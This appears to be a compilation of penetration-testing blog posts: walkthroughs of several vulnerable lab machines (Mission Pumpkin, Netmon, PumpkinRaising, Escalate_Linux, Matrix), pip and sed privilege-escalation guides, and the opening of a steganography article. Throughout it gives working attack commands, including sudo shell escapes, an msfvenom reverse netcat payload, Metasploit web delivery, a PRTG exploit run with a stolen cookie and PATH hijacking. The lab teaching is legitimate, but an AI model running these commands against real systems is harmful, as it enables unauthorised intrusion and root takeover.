Today we are going to solve another CTF challenge known as mission Pumpkin and credit for making this VM machine goes to Jayanth which is designed for people who are beginners in hacking field. The mission of this CTF is to gain access to PumpkinGarden_keyfile stored in the root account. So, let’s proceed towards solve this Mission Pumpkin.

You can download this VM from vulnhub.com: https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/

Security Level: Beginner

Penetration Methodology:

Scanning

· Nmap

Enumeration

· Credential Harvesting

· Web Directory search

Exploiting

SSH connect

Privilege Escalation

Scanning

Let’s start with our first step which is scanning, for which we will use Nmap tool to check open ports states.

nmap -p- -A 192.168.0.14

Here as we can see that port 21 for FTP is open and anonymous user can login ftp. Moreover, we can also observe that http is service in running on port 1515 and open ssh service is running on port 3535. Now we will move towards our next step which is enumeration.

Enumeration

First, we will try to connect through ftp with anonymous as username and password. Here we have found note.txt then we will transfer this file in our system

get note.txt

cat note.txt

Now as we had seen that apache service was running on port 1515. So, we will open that in our browser where we have not found anything interesting.

Now we will use dirb for web directory enumeration and we will found the image directory there.

dirb http://192.168.0.14:1515/

Inside the image directory; we got a file named hidden_secrets. When we opened that file, we got our next clue which was a secret key.

This key is encrypted in base64 so first we will decode it to get the clue.

echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d

Now we are assuming that that these can be the usernames:scarecrow and passwords:5Qn@$y.

Exploiting

Now we will try to connect though ssh with .Here we have found file note.txt and after opening this we will get another clue which is password; so will check the list of users in etc/passwd file and we got the user now we will switch to goblin user entering the password key and we are successful in doing so and here also we got our next clue which will help us in finding the key of mission pumpkin.

ssh scarecrow@192.168.0.14 -p3535

tail /etc/passwd

su goblin

In goblin user we found an another note file which contains a link of expoloit db for exploiting as shown in the image at the bottom.

Now we will click on the link which is provided there and download the bash file which holds the method to gain access of root.

cat 38362.sh

So, as we run the commands which we have got we will get the root access and we are logged in as root. We have got pumpkeygarden_key here which reflects that we have solved this CTF successfully.

The main objective of this article is to make attentive our readers for the another most expedient command from the list of linux for pentesters. As we know apart from copying, downloading and searching task user desires other excessive operational mission i.e. installation of packages. So in this article we are going to make you familiar with the command that can perform such task i.e. “pip”. The main utilities of this command is to install, unistall, search python packages. So by knowing these functionality of pip command now we will check that how we can acquire its benefit in our mission of Privilege Escalation.

Table of content

Introduction to pip

· Major Operation performed using pip

Exploiting pip

· SUID Lab setups for privilege Escalation

· Exploiting SUID

Introduction to pip

Before we start, let's do a quick appendix check and determine what a 'Python package' is in actually. It is a Python module which can contain other modules or recursively, other packages. It is the kind of Python package that you import in your Python code. So there are many tools available that helps to install such packages and “pip” is one of that which is widely used in today’s era.

The pip is an abbreviation of “python install packages” which is a tool for installing and managing Python packages. This command is very useful for web development as well as for sys-admins who manages cloud computing based resources. Now we will start by running its help command to know the depth of “pip” operations.

pip --help

Major operations performed by “pip”

List all installed packages: To check the list of all installed python packages in our machine we can use option “list” followed by pip command. The list option has its vital role in pip command as it can perform many operations that a user can need. Some of these functions are listed below:

· List installed packages: This will help in listing all the installed packages.

pip list

Other option for package listing:

Syntax: pip list

List outdated packages: Whenever we wish to check the list for all those packages that are outdated then we will use “--outdated” option followed by pip list command which will provide the list of all installed outdated packages with its current and latest version.

pip list --outdated

List installed packages with column formatting: If we wants to display the desired output in specific format then we will use “--format” option for this purpose. Suppose I want wish to list the details in column format then I will frame command as below.

pip list --format columns

List outdated packages with column formatting: This is same as format option consisting some more fields to display the output as current version, latest version, and type of installed packages.

pip list -o --format columns

List packages that are not dependencies of other packages: whenever anybody required to check the list for those installed packages who are not have any kind of responsibleness of other packages then we will frame command as below.

pip list --outdated --not-required

To install new package: As above I have described main objective of pip command is “installing new packages” so now by grabbing this advantage I am installing ‘flask”.

Syntax: pip install

pip install flask

Show information about packages: The “show” option in pip assist to reflects the detailed information about installed packages.

Syntax: pip show

pip show flask

As from below image it can be well understood that after using show option it has produced the output by showing the relevant information of flask.

To uninstall any package: Apart from installing the software packages we also required its other phase i.e. uninstallation. The pip command tends this utility too where one can uninstall the desired packages without any hassle.

Syntax: pip uninstall

pip uninstall jinja2

Here in the below image I’m showing to uninstall “jinja2” which is a modern-day templating language for Python developers.

To freeze any package: Freezing is a procedure where pip reads the versions of all installed packages in a local virtual atmosphere and then produces a text file with the package version for each python package stated. For performing this operation use option “freeze” as shown below.

Syntax: pip freeze >

pip freeze > komal.txt

To search for installed package: The search option helps to search for an available Python package. The search term generates quite a widespread group of packages.

Syntax: pip search

pip search keyring

Most of the time, we wish to hunt for packages directly in the PyPI website. So PyPI delivers such search abilities for its index and a way to filter results. Now I’m framing command as shown below to search for “keyring”.

To create hash for any package: A Hash Value is a string value of specific length which is the result of calculation of a Hashing Algorithm. One of the chief uses of Hash Values is to define the Integrity of any Data (which can be a file, attachments, downloads etc).

Syntax: pip hash

pip hash rockyou.txt

The pip provides this functionality too to maintain the integrity of installed packages. In below image I’m using this option for creating hash value of a file i.e. “rockyou.txt.

To download any file or package: Instead of above all described task “pip” also supports the functionality to upload, download, read etc. for any file. Here I’m using one of these i.e. download the package. Pip download use to download file and package into default path or can do the same for specific path.

In below image I have used this to download a compressed file from remote location.

Syntax: pip download

pip download http://192.168.1.10:8000/5622.tar.bz2

Exploiting pip

Sudo Rights Lab setups for Privilege Escalation

Now we will start our task of privilege escalation. For this very first we have to set up our lab of pip command with administrative rights. After that we will check for the pip command that what influence it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /usr/bin/pip

Exploiting Sudo rights

Now we will start exploiting pip service by taking the privilege of sudoer’s permission. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.108

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the pip command as “root” without a password.

sudo -l

Now after knowing the fact that test user attains admin rights so, taking this benefit here we can use pip command to run in privileged context and can be used to access the file system, escalate or maintain access with higher privileges if permitted on sudo.

TF=$(mktemp -d)

echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')"> $TF/setup.py

sudo pip install $TF

Conclusion: Hence we have successfully exploited pip by achieving its functionality after granting higher privilege.

Reference link: https://gtfobins.github.io

Netmon is a recently retired CTF VM on Hack the Box with the objective – Capture the user and root flag. Hack the Box offers a wide range of VMs for practice from beginner to advanced level and it is great for penetration testers and researchers.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of Help is 10.10.10.152

Penetration Methodology

Scanning

Network Scanning (Nmap)

Enumerating

Browsing the webpage

Enumerating FTP

Exploiting

Anonymous Login in FTP

Reading user.txt

Privilege Escalation

Enumerate for config file

Logging in Administrator Panel

Exploiting RCE

Reading root.txt

Walkthrough

Scanning

Let’s start off with scanning with the nmap to check open ports.

nmap -A 10.10.10.121

Here I found port 21 for FTP, 80 for HTTP, 135 for RPC, 139 for NetBIOS, 445 for SMB are opened, rest were filtered.

We immediately proceed towards port 80 when we see it open. We find PRTG Network Monitor page. But to use this dashboard, we need the login credentials. But we don’t have the access to those credentials at this stage.

In the nmap scan earlier, we saw that the FTP port 21 is open as well allows Anonymous Login. So, we login the FTP using the Anonymous as Login as well as password. After successfully logging, we use the ls command to list all the files that are shared. We see that we Users Directory available so we traverse into it using the cd command. Here, we have 2 more directories, Administrator and Public. We don’t have permission to access the Administrator directory so we move into the Public Directory. Here we find the user.txt file. We use the get command to download this file onto our system. Hence, we got our first flag, that is; the user flag.

ftp 10.10.10.152

ls -la

cd Users

cd Public

get user.txt

Now we need to get the root flag. For this we went to our most dependable friend, Google. After working our way through some of the PRTG Network Monitor manuals and help pages, we found this post. This gives us the location of the data that PRTG Network Monitor stores, that is “%programdata%\Paessler\PRTG Network Monitor”. As we still have the FTP connection, we went to ProgramData directory and then traversed all the way to the location mentioned. Here we located an old configuration file. We downloaded this file to our system, so that we can analyse it closely.

cd ProgramData

ls -la

cd Paessler

ls

cd "PRTG Network Monitor"

ls

get "PRTG Configuration.old.bak"

After successfully downloading and searching through many lines of code, we stumbled upon the password, that was used previously. We took a guess here, as this was the previous configuration and it contains the year 2018 and whenever there is a current date in the password then they could be updated with the change in the date to the latest date.

This means, that the previous password was PrTg@dmin2018 and since the current year is 2019, we replaced the 2018 in the password by 2019. This was an educated guess we made. So, using the new login credentials, we successfully logged in the PRTG Network Monitor Dashboard.

Login Name: prtgadmin

Password: PrTg@dmin2019

After looking around the dashboard for some time, we didn’t find anything that could help us in our quest to get the root flag. So, we went to another dependable friend, Exploit DB. We searched the exploit dB for PRTG Network Monitor and found this exploit. On further researching on the internet about this exploit, we found this script on GitHub. This script creates a PowerShell file and then it uses it to run commands on the target system to create a user. But in order to work, it need the cookie that was used in the original login in the dashboard of the PRTG Network Monitor. We capture the request using the Burp Suite. Upon close inspection of the captured packet, we find the cookie that we require.

Now, we clone the git directory that contains the script that we require to create a new user. After giving the necessary permissions to the file to run. We run the prtg-exploit.sh file, with the Target IP Address and the cookie captured as parameters. This script can take some time to run depending on your connectivity speed. But after successfully running it creates a user with following credentials.

Username: pentest

Password: P3nT3st!

./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.780888731.156187260; _gid=GA1.4.641622581.1562574873; OCTOPUS1813713946=ezQ3N0RENjcwLUFCQzItNDQ1Ri04Q0IyLUZDMjlFOUU3QjQ0Qn0%3D"

Now that, we have the user created on the target machine with Administrative Rights, let’s nab that root flag and complete this challenge. We will use the psexec.py script form the impacket tool kit to connect to the Target machine. You can use any of the methods that are provided in this article. Here, we chose to run it directly as a python file. We need the username, password and target IP address as parameters as shown in the image given below. As we can see that after running, psexec gives the shell with Administrator rights. Now, we used the cd command to traverse into the Desktop Directory to find the root flag.

python psexec.py 'pentest:P3nT3st!@10.10.10.152'

cd ..

cd Users\Administrator\Desktop

type root.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

PumpkinRaising is another CTF challenge from the series of Mission-Pumpkin v1.0 created by keeping beginners in mind and all credit for this VM goes to Jayanth. This level is all about identifying 4 pumpkin seeds (4 Flags - Seed ID’s) and gain access to root and capture final Flag.txt file.

You can download it from here: https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinraising,324/

Level: Beginner to Intermediate

Penetrating Methodologies

Scanning

· Nmap

Enumeration

· Robots.txt

· Abusing HTTP services

Exploiting

· Ssh Login

Privilege Escalation

· Abusing Sudo right

Walkthrough

Scanning

Let’s start with network scanning as the IP of this VM is 192.168.0.11. So, initializing this VM by scanning open port and running services over those port with the help nmap.

nmap -A 192.168.0.11

From its scan result, I found port 22 for ssh and 80 for http are available, moreover it gave some hint for /robot.txt file that disallows 23 entities.

Enumeration

So first we navigate to web browser and explored the VM IP and welcome by following web page. Read the following message:

“To raise Pumpkins, we need to collect seeds at the first step. Remember Jack? He is the only expert we have in raising healthy Pumpkins. It’s time to get in search of pumpkin seeds”

From this message we can assume for “Jack” which could be a username.

Further, I explored /robot.txt file suggested in nmap scan and found some list of interesting directories, files and paths. Apart from all entries I found few interesting entries such as: /hidden/notes.txt, /underconstruction.html and /seeds/seed.txt.gpg. so, we have explored each entry one-by-one.

The hidden note.txt showed certain data which may be needed to login credentials subsequently.

http://192.168.0.11/hidden/notes.txt

Robert: C@43r0VqG2=

Mark: Qn@F5zMg4T

goblin: 79675-06172-65206-17765

when I checked the source code of the homepage and here, I found a link for pumpkin.html

On exploring source code of http://192.168.0.11/pumpkin.html, I found a base32 encode string.

With the help of online base32 decoder we have decoded the string and note the path /scripts/spy.pcap that could be a hint for seed’s id.

To identity what is inside the spy.pcap file, I simply downloaded the file in our local machine and used Wireshark to read the network packet.

Here I found the first seed: 50609 from inside the tcp steam as shown in the below image.

Again, we come back to pumkin.html page and I found decimal string on scrolling same file.

On decoding decimal string, we found one more seed:96454

As you know we have enumerated /robots.txt and from inside that we found another important file /underconstrution.html as shown below. So, we have explored the source code of the web page and noted hint for an image.

Now, we have explored the below URL and found a picture for pumpkin which I have downloaded in my local machine.

http://192.168.0.11/image/jackolantern.gif

After downloading the pumpkin image, I check for hidden data with help of stegosuite. This image was password protected image and if you remembered we had enumerated “Mark: Qn@F5zMg4T” secret keys from inside /hidden/notes.txt

I used the key: Qn@F5zMg4T for extracting the hidden file “decorative.txt” from inside the stegno image.

So, when I opened this file, it gave me another PUMP-Ke-Mon Pumpkin seed: 86568

Further I downloaded .gpg file as the link /seeds/seed.txt.gpg which was mention in the robot.txt file.

wget http://192.168.0.11/seeds.txt.gpg

gpg -d seeds.txt.gpg

So, when I tried to open the file, I noticed that it requires the passphrase to decrypt the encrypted data which I don’t know. Here I tried to use above enumerated keys but could not able to decrypt it. After so many attempts, I successfully decrypted the file by entering SEEDWATERSUNLIGH which was mentioned in the home page of website in the 2^nd image.

On decrypting I obtained following text file as shown below and it was a Morse encodedtextwhich used in telecommunication that encodes text characters as standardized sequences of two different signal durations called dots and dashes.

To decrypt the Morse text I have used cyberchefwhich is an online decrypting tool. On decrypting the text, I found another BIGMAXPUMPKIN seed 69507

As it was declared by author that in this VM we need to find 4 SEED’s ID and a root flag. Hence, we have collected all 4 seed’s id but for getting root flag, we need to compromise the VM.

When I didn’t get any vulnerability to compromised it, I tried to access ssh by the combination of all 4 seed found in this VM and used this as password for user jack.

1. SEED ID: 69507

2. SEED ID: 50609

3. SEED ID: 96454

4. SEED ID: 86568

ssh jack@192.168.0.11

SSH login Password: 69507506099645486568

Yuppie!! We got the shell access but for obtaining root flag we need to escalate the privilege from low privilege shell to high. Therefore, I check for sudo rights for user jack and found jack can run strace with sudo rights.

Hmmm! We can abuse the sudo permission set for strace program. Hence type following and obtain the root flag.

sudo strace -o/dev/null /bin/bash

cd /root

cat flag.txt

Escalate_Linux is an intentionally developed Linux vulnerable virtual machine. The main focus of this machine is to learn Linux Post Exploitation (Privilege Escalation) Techniques. The credit for making this VM machine goes to “Manish Gupta” and it is a boot2root challenge where the creator of this machine wants us to root the machine through twelve different ways. You can download the machine following this link:https://www.vulnhub.com/entry/escalate_linux-1,323/

NOTE: In this article we have exploited the machine by six different methods.

Security Level: Beginner-Intermediate

Penetrating Methodology:

Scanning

· Netdiscover

· Nmap

Enumeration

· Web Directory Search

Exploiting

· Metasploit shell upload

· LinEnum.sh

Privilege Escalation

· Method 1: Get root shell by exploiting suid rights of shell file

· Method 2: Get root shell by cracking the root password

· Method 3: Get root shell by exploiting sudo rights of user1

· Method 4: Get root shell by exploiting crontab

· Method 5: Exploiting Sudo rights of vi editor

· Method 6: Exploiting writable permission of /etc/passwd file

Walkthrough:

Scanning:

Let’s start of by scanning the network using Netdiscover tool and identify the host IP address. We can identify our host IP address as 192.168.0.17.

Now let’s scan the services and ports of target machine with nmap

nmap -A 192.168.0.17

Enumeration:

As we can see port 80 is open, so we tried to open the IP address in our browser and got nothing but the default apache webpage.

So we used dirb with .php filter for directory enumeration.

dirb http://192.168.0.17–X .php

After brute forcing with dirb we found a URL named http://192.168.0.17/shell.php

Now we opened the url in our browser and found that it accepts cmdas get parameter.

So, we passed the id command in the url and found the results are reflected in response.

Exploiting

Since the target machine is vulnerable to command injection, we created a web delivery shell using Metasploit.

use exploit/multi/script/web_delivery

set srvhost 192.168.0.12

set lhost 192.168.0.12

exploit

The target host was not able to run the script directly, so we used url encoding.

After encoding the script, we were successfully able to run it on the target machine and get the meterpreter session. We got the bash shell of User6 after using python one liner shell command.

To further enumerate the target host, we uploaded LinEnumtool on the target host.

upload /root/LinEnum.sh

shell

python -c 'import pty; pty.spawn("/bin/sh")'

chmod 777 LinEnum.sh

./LinEnum.sh

From the results of LinEnum scan we found that the target host has eight users namely user1, user2 upto user8.

We also found that in crontab, a file named autoscript.sh is being run every 5 minuteswith root privileges.

From the same LinEnum scan we came to know that /etc/passwd is writable for users also. Also we found that we can run shell and script files with root privileges because SUID bit is enable on it.

Privilege Escalation:

As mentioned above there are multiple ways to do the privilege escalation of this machine.

We will try to do as many methods as possible.

Method 1: Get root shell by exploiting SUID rights of shell file

Using the find command we can confirm that the shell file located in the home directory of user3 can be executed with root privileges.

We tried to execute the same file and got the root shell.

find / -perm -u=s -type f 2>/dev/null

cd /home/user3

./shell

Method 2: Get root shell by cracking the root password

From the above screenshot we know that script file located in the user5 home directory can be executed with root privileges. Using the Path variable exploitation methodology we can access the /etc/shadow file.

To know more about path variable privilege escalation use this link:https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

cd /tmp

echo “cat /etc/passwd” > ps

chmod 777 ps

export PATH=/tmp:$PATH

cd /home/user5

./script

We copied the hashed password of root user in hash file and used john the ripper tool to crack the password. We got the password of the root as 12345 and then using the su command we were able to access as root.

John hash

su root

Method 3: Get root shell by exploiting SUDO rights of user1

We already know by now that script file can be executed with root privileges.

Using the same script file we can change the password of all the users with the help of Path variable methodology.

Here we used echoand chpasswd command to replace the existing password with our new password 12345. And then switched to user1 account using su command. After checking the sudoer’s list for user1 we came to know that this user can run all commands as sudo.

So we ran the command sudo su and got the root access.

echo ‘echo “user1:12345” | chpasswd’ > ls

chmod 777 ls

export PATH=/tmp:$PATH

cd /home/user5

./script

su user1

sudo –l

sudo su

Method 4: Get root shell by exploiting crontab

In the previous screenshot we saw there is a task scheduled after every 5 minutes for user4 in the crontab by the name autoscript.sh. We changed the password of user4 the same way like we did for user1 and then switched to user4 with the new password 12345. There we can see a file autoscript.sh in the Desktop folder.

su user4

ls -la

So what we did is we created a payload using msfvenom and then copied the code into autoscript.sh file using echo.

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.0.12 lport=8888 R

echo “code” >autoscript.sh

After copying the code into autoscript.sh file we executed the file and started the netcat listener on our kali machine and waited for shell.

Yes we got the root shell as the autoscript.sh is executing as root in the crontab.

nc –lvp 8888

Method 5: Exploiting SUDO rights of vi editor

We changed the password of all the users to 12345 using the same methodology as above and switched between users to check for more exploits. We found that user8 has a sudo permission for vi editor.

su user8

sudo -l

Open the vieditor with sudo and insert sh command as show in the screenshot below, exit the editor and hurray we got the root shell.

:!sh

ids

Method 6: Exploiting writable permission of /etc/passwd file

Continuing with enumeration of users, we found that user7 is a member of root group with gid 0.

And we already know from the LinEnum scan that /etc/passwdfile is writable for user. So from this observation we concluded that user7 can edit the /etc/passwd file.

tail /etc/passwd

su user7

So we copied the contents of /etc/passwd file in our kali machine and created a new user named raj with root privileges for which we generated a password pass123 using openssl.

On the target machine we downloaded the edited passwd file in the /etc folder using wget command.

Then we tried to switch to our newly createduser raj and YES yet again we proudly got the root shell of the machine.

cd /etc

wget –O http://192.168.0.12:8000/passwd

Su raj

Conclusion: So in this part-1 of Escalate_Linux we did the privilege escalation by six different methodologies. In the part-2 we will try to exploit the machine by some different methods. So keep visiting Hacking Articles for next part.

This article will take our readers through all about Stream Editor (Sed), which is one of the most prominent text-processing service on GNU/Linux. In this article we came with the brief introductory guide to sed which supports the main concern that how sed works and how we can accomplish its supplementary practice in the operation of Privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”

Table of Content

Overview to sed

· Summary to sed

· Chief Action achieved using sed

o Replacement with the sed command

o Printing and viewing from sed command

o Deleting lines with sed

Abusing sed

· SUDO Lab setups for privilege Escalation

· Exploiting SUDO

Summary to sed

SED command in LINUX/UNIX is stands for “stream editor” that can implement lots of purpose on file like, searching, find and replace, insertion or deletion. However most common use of SED command is for exchange or for discover and swap. By using SED you can edit files even without opening it, which is much faster technique to find and replace something in file. It is a powerful text stream editor which can do insertion, deletion, search etc. for any file as per user requirements. This command also supports regular expression that allows it to perform complex pattern matching too. Now to know further about “sed” command we will start from its help option.

Note:“It's worth remarking that this article omits several commands, as our main concern is to reach about the “sed” influence over Privilege Escalation”.

sed --help

Key actions achieved by “sed”

1 Replacement with the sed command: As we know the “sed” performs many tasks that includes insertion, deletion, modification and so on for any file as per user request so now we will start our journey to explore the entire utility of sed one by one.

1.1 Substituting or switching string: “sed” is used to replace or swap the string so whenever we need to exchange any string within a file then we will frame command as:

nano Ignite.txt

cat Ignite.txt

sed 's/Ignite/Egnyte/' Ignite.txt

In the above command “s” denotes the substitution action. The “Ignite” is the hunt pattern and the “Egnyte” is the replacement string. By default, the sed command replaces the first incidence of the pattern in each line and it won’t replace the second, third…occurrence in the line.

1.2 Substituting the nth existence in a line: When we want to replace nth occurrence i.e. first, second and so on existence of a pattern in a line then we will use the /1, /2 etc flags to mention the nth term.

sed 's/Ignite/Egnyte/2' Ignite.txt

Here I’m swapping for 2^nd occurrence in each line.

1.3 Substituting all the existence at a time:As we know by default the sed command replaces the first incidence of the pattern in each line so if we wish to replace all occurrence simultaneously within a file then we can use flag “/g” for this purpose.

sed 's/Ignite/Egnyte/g' Ignite.txt

1.4 Substituting from nth occurrence to all existences:When we use “/g” this will make change globally to the entire file so if we want to make this swapping from a specific place then we need to mention that value(nth) from where we want to make changes.

sed 's/Ignite/Egnyte/3g' Ignite.txt

On framing the above command it will replace all the patterns from the nth occurrence globally.

Note:In the below image you can’t see any changes for flag “3g” as my file doesn’t contain any 3rd occurrence of replaced word but whenever there is existence of substituted word at multiple times within a line then you can clearly see the changes that how its change globally from nth term.

1.5 Substituting the existence for a particular range: We can limit the sed command to replace the string for a particular range. This can be achieve by framing command as shown below.

sed ‘1,3 s/Ignite/Egnyte/’ Ignite.txt

On framing this command the “sed” will replace “Ignite” starting from first line to third line.

Note: One can use “$” in place of end index if we want substitute from nth term to last line in the file.

2 Printing and viewing from sed command: Apart from substituting the string sed can help in printing and viewing a file as per user’s instruction.

2.1 Replicating the replaced line with /p flag: If we want to make duplication for replaced line then we can use “/p” flag which prints the replaced line twice on the terminal. If a line does not have the search pattern and is not replaced, then it will print that line only once.

sed ‘s/Ignite/Egnyte/p’ Ignite.txt

2.2 Printing only the replaced lines:If user wants to print only those lines which are substituted then he can use “-n” option following by print command as shown below.

sed -n ‘s/Ignite/Egnyte/p’ Ignite.txt

As from below image it can be cleared that on using “-n” the print flag has printed all the replaced line as output.

2.3 Printing lines by numbering it:This command is similar to “cat” in which we use “-n” for numbering the line for any file, same we can achieve from sed command too by framing the command as below.

sed = a.txt | sed 'N; s/^/ /; s/ *$.\{4,\}$\n/\1 /'

On drawing the above command sed will print the output by numbering each line as per user request.

2.4 Display a file from x to y range: If we want to view a file from an instance i.e. for a range of starting index to end index then we write command as:

sed -n ‘2,4p’ Ignite.txt

If we use “d” instead of “p” then sed will View the entire file except the given range.

2.5 Print nth line of the file: Inplace of fixing end index you can also leave it blank if you wish to print only a specefic line.

sed -n ‘4’p Ignite.txt

As in below screenshot you can see when i have used above mentioned command then sed has reflectd the output only to print for 4th line.

2.6 Print from nth line to end of file: To print any file from its nth line to the last (end of file) line then frame command as below:

sed -n ‘4,$’p Ignite.txt

Here “$” is indication for reflecting last line of file.

2.7 Print the line only for pattern matching: If we want to print only those lines which matches the given pattern then in this case we will draw command as:

sed -n /training/p Ignite.txt

From below image it is clear that how this command works. Here in below image I have print those lines which includes the word “training”.

2.8 Print lines which matches the pattern nth line: We can use numeric value along “p” to print for pattern matching till nth line.

sed -n ‘/cyber/,3p’ Ignite.txt

3Deleting lines with sed: Now we check how we can delete the lines from file by the help of sed.

3.1 Remove a specific line: To delete any particular line within a file us “d” option followed by sed command. Here I’m deleting 3^rd line from “Ignite.txt”.

sed ‘3d’ Ignite.txt

3.2 Remove line for a range: If we wish to delete content till a particular range then we will set its “intial index value” and “end value” of file. In below image I have deleted content of “Ignite.txt” from its 3^rd line to 5^thline and will attain output for remaining file content.

sed ‘3,5d’ Ignite.txt

3.3 Remove from nth to last line: Instead of fixing end index one can also use “$” to delete lines till the end of file.

sed ‘2,$d’ Ignite.txt

Here “2” indicating for the initial index from where deletion must done and “$” is indicating to delete lines till the end of file.

3.4 Remove the last line: If we won’t set any index value then “$d” will simply delete only the last line of the file.

sed ‘$d’ Ignite.txt

3.5 Remove the pattern matching line: Sometimes we not only want to print or view those lines that matches particular pattern but also desire to delete them so in such case we will frame below command to attain output as per user request.

sed ‘/training/d’ Ignite.txt

Here in below image sed has deleted all those lines which matches the word “training”.

Abusing sed

Sudo Rights Lab setups for Privilege Escalation

Now we will start our mission of privilege escalation. To grab this first, we have to set up our lab of sed command with administrative rights. After that we will check for the sed command that what impact it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /usr/bin/sed

Exploiting Sudo rights

Now we will start exploiting sed facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of victim’s machine then only we can execute this task. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.108

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the pip command as “root” without a password.

sudo -l

Now we will access our /etc/passwd file by the help sed command to escalate or maintain access with elevated privileges.

Conclusion: Hence we have successfully exploited “sed” by achieving its functionality after granting higher privilege.

Reference link: https://gtfobins.github.io

Today we are going to take another CTF challenge from the series of Matrix. The credit for making this VM machine goes to “Ajay Verma” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge.

You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

1. Scanning

· Netdiscover

· NMAP

2. Enumeration

· Web Directory search

3. Exploitation

· Ghidra

· SSH

4. Privilege Escalation

· Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start of by scanning the network and identifying host IP address. We can identify our host IP as 192.168.1.104 by using Netdiscover.

Then we used Nmap for port enumeration. We found that port 80 is open, SSH is running on port 6464 and port 7331 is open on the target machine.

nmap –p- –A 192.168.1.104

Enumeration:

As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.

So we used dirb for directory enumeration.

dirb http://192.168.1.104

After brute forcing with dirb we found a directory named /assets

We opened the assets directory in the browser and found an image file named Matrix_can-show-you-the-door.png under /assets/img/ URL.

We first opened this image but didn’t find anything of our use. Then upon looking at the file name properly we found out that the name of the file is itself giving us the path forward.

So we used Matrix in the URL as show in the image below and it worked for us.

From the contents of the directory Matrix we understood that we have to make a right combination of the alpha numeric to go ahead.

So after trying multiple combinations we used our little brain more aggressively and made a combination of n/e/o/6/4, neo is the name of the actor in the Matrix movie and 64 number is I guess favorite number of the creator of this VM because he is using it everywhere.

We downloaded the file secret.gz and found that it’s actually a txt file and is containing the username and password.

file secret.gz

cat secret.gz

Upon cracking the hashed password using online tool hashkiller, we found the password as passwd.

If you remember from the nmap scan we have a port 7331 open and it was protected with Basic Authentication.

So we tried to open the URL http://192.168.1.104:7331 and were prompted for authentication, so we used admin:passwd as username and password and were able to login successfully.

But we couldn’t find anything useful there, so we used dirb with already obtained username and password for directory bruteforcing.

After bruteforcing we found a directory named data.

dirb http://192.168.1.104:7331 / -u admin:passwd

In the data directory we found a file name data which came out to be a DOS file.

Exploitation:

We took help of our best friend in need Google to know how to open a DOS file. And after some research we found a tool named Ghidra for opening a DOS file.

After opening the data file with Ghidra tool we found a username and password guest:7R1n17yN30

As we already know from our nmap scan that there is SSH running on port 6464 on the target machine, so we tried to ssh the target machine with the above found username and password and were successfully able to login.

ssh guest@192.168.1.104–p 6464

But we were providing with the restricted bash (rbash) shell, so we used –t option to run ssh with noprofile extension and we got a complete shell of guest user.

Checking the sudo permissions for guest user we came to know that this user can run /bin/cp with permissions of another user trinity.

ssh guest@192.168.1.104–p6464 –t “bash –noprofile”

sudo -l

Privilege Escalation:

To elevate to a more privilege’s user, what we did is we created a new ssh key pair, gave read write execute permissions to id_rsa.pub file so that we would be able to copy it to our target location.

ssh-keygen

cd .ssh

chmod 777 id_rsa.pub

And then we took the advantage of sudo permission to copy the id_rsa.pub file in the /home/trinity/.ssh/authorized_keys folder. Now we can access ssh of the target machine with trinity user using the id_rsa key.

Checking the sudo permission for trinity it can execute oracle file with root permissions.

cp id_rsa.pub /home/guest

cd ..

sudo –u trinity /bin/cp/ ./id_rsa.pub /home/trinity/.ssh/authorized_keys

ssh trinity@127.0.0.1–I /.ssh/id_rsa –p 6464

sudo -l

But there was no file with the name oracle in the /home/trinity directory, so we created an oraclefile with /bin/sh in itusing echo command. In the end we executed the oracle file with sudo command, we got the root shell.

And once you have the root shell you can easily get the flag.

echo “/bin/sh” > oracle

chmod 777 oracle

sudo ./oracle

cat flag.txt

In this post, we will introduce the multiple ways for hiding any text that are based on Audio, Image, Video and White text. For achieving this we will use a method that is known as “Steganography”. The term steganography refers to the technique of hiding secret data within an ordinary, non-secret, file or message in order to avoid detection. So here we will check all those methods that can help us for doing same.

Table of content

Introduction

Purpose of Steganography

Methods of Steganography

· Audio based Steganography

· Image based Steganography

· Video based Steganography

· White text Steganography

Introduction

Steganography is the practice of hiding a file, message, image of video in another file like message video or audio. In general, the hidden message seems like something else like pictures, articles and sometimes shopping list. While the practice of encryption is to protect the content of a message alone, the style of steganography both concerns the disclosure and content of a secret message. Steganography covers data concealed in computer files. So, lets understand this in a better way with the examples. First let’s understand what is the purpose of steganography.

Purpose of Steganography

